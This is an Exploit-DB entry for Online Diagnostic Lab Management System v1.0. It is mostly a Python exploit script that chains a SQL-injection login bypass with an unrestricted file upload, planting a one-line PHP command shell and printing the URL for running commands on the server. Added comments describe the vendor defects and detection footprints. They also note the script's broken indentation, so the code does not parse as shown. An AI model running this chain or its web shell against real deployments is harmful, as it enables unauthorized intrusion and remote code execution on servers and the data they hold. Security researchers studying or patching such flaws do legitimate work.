Online Diagnostic Lab Management System v1.0 – Remote Code Execution (RCE) (Unauthenticated)

  • 作者: yousef alraddadi
    日期: 2023-03-25
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51045/
  • # Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)
    # Google Dork: N/A
    # Date: 2022-9-23
    # Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
    # Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
    # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip
    # Tested on: windows 11 - XAMPP
    # Version: 1.0
    # Authentication Required: bypass login with sql injection
    
    #/usr/bin/python3
    
    # Proof-of-concept for the advisory in the header: a SQL-injection login
    # bypass against login.php, followed by an unrestricted file upload through
    # createOrder.php, which is what turns the bypass into code execution.
    # The comments below name the vendor-side defect each request relies on and
    # the control that would close it, so the script reads as a fix/detection
    # checklist rather than a recipe. `sys` and `time` are imported but unused.
    import requests
    import os
    import sys
    import time
    import random
    
    # clean screen (both commands are issued; whichever the host lacks fails silently)
    os.system("cls")
    os.system("clear")
    
    logo = '''
    ##################################################################
    ##
    #Exploit Script ( Online Diagnostic Lab Management System ) #
    ##
    ##################################################################
    '''
    print(logo)
    
    # Base URL as typed by the operator; no scheme or trailing-slash
    # normalisation happens before the paths below are appended to it.
    url = str(input("Enter website url : "))
    # Login-bypass value in the username field; the password is irrelevant.
    # This only works when login.php splices the raw username into its SQL
    # (header: "bypass login with sql injection"). A parameterized query on the
    # server makes the value inert no matter what it contains.
    username = ("' OR 1=1-- -")
    password = ("test")
    
    # One session, so the cookie set by the login response is reused for the upload.
    req = requests.Session()
    
    target = url+"/diagnostic/login.php"
    data = {'username':username,'password':password}
    
    website = req.post(target,data=data)
    # Writes a one-line PHP command shell to the local working directory.
    # This handle is closed, but the file is reopened at "productImage" below
    # and that second handle is never closed.
    files = open("rev.php","w")
    payload = "<?php system($_GET['cmd']);?>"
    files.write(payload)
    files.close()
    
    # Random 128-bit number used as the upload's filename (shadows builtin `hash`).
    # The .php extension is the upload-side defect: createOrder.php presumably
    # accepts any extension and stores the file under the web-served
    # assets/myimages/ path (see the printed URLs below). An extension/content
    # whitelist, or storing uploads where PHP is not executed, blocks this step.
    hash = random.getrandbits(128)
    name_file = str(hash)+".php"
    # Success is judged by a marker string in the login response body.
    if "Login Successfully" in website.text:
    
    # NOTE(review): the branch body (down to `else:`) has lost its indentation
    # in this listing, so the script does not parse as shown.
    print("[+] Login Successfully")
    website_1 = url+"/diagnostic/php_action/createOrder.php"
    
    # Multipart "create order" form with every business field empty; only the
    # productImage part carries content. Server-side, the order handler should
    # reject the request on the empty required fields before touching the upload.
    upload_file = {
    "orderDate": (None,""),
    "clientName": (None,""),
    "clientContact" : (None,""),
    "productName[]" : (None,""),
    "rateValue[]" : (None,""),
    "quantity[]" : (None,""),
    "totalValue[]" : (None,""),
    "subTotalValue" : (None,""),
    "totalAmountValue" : (None,""),
    "discount" : (None,""),
    "grandTotalValue" : (None,""),
    "gstn" : (None,""),
    "vatValue" : (None,""),
    "paid" : (None,""),
    "dueValue" : (None,""),
    "paymentType" : (None,""),
    "paymentStatus" : (None,""),
    "paymentPlace" : (None,""),
    "productImage" : (name_file,open("rev.php","rb"))
    }
    
    up = req.post(website_1,files=upload_file)
    # The response `up` is never inspected; the printed URLs assume the upload
    # landed under assets/myimages/ with the client-supplied name. For
    # detection: a new *.php file in that directory, or a request to it carrying
    # a `cmd` query parameter, is the footprint this script leaves.
    print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)
    print("[+] can exect command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")
    else:
    print("[-] Check username or password")